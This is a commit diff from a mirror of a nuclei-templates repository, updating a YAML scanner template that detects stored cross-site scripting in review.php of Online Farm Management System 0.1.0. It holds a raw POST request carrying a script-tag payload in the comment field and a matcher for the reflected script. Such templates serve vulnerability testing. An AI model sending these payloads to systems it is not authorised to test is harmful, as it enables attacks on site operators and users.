daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update onlinecms-xss.yaml

patch-1
Ritik Chaddha 2022-07-20 23:52:19 +05:30 committed by GitHub
parent acc357f591
commit 9e829668a4
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 9 additions and 7 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

16
vulnerabilities/other/onlinecms-xss.yaml
View File

@ -1,23 +1,25 @@
id: onlinefarmcms-xss
info:
name: Online Farm Management System 0.1.0 - Persistent Cross-Site Scripting
name: Online Farm Management System 0.1.0 - Cross-Site Scripting
author: arafatansari
severity: medium
reference:
- https://www.exploit-db.com/exploits/48673
description: |
Online Farm Management System is affected by Cross-Site Scripting on the review.php file.
tags: xss,,cms,persistent
reference:
- https://www.exploit-db.com/exploits/48673
metadata:
verified: true
tags: onlinefarm,cms,xss
requests:
- raw:
- |
POST /agro/reviewInput.php?pid=1 HTTP/1.1
POST /reviewInput.php?pid=1 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
comment=%3Cscript%3Ealert%281%29%3Cscript%3E&rating=0
comment=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E&rating=0
redirects: true
max-redirects: 2
@ -26,7 +28,7 @@ requests:
- type: word
part: body
words:
- '<script>alert(1)</script>'
- '<em style="color: black;"><script>alert(document.domain)</script>'
- type: word
part: header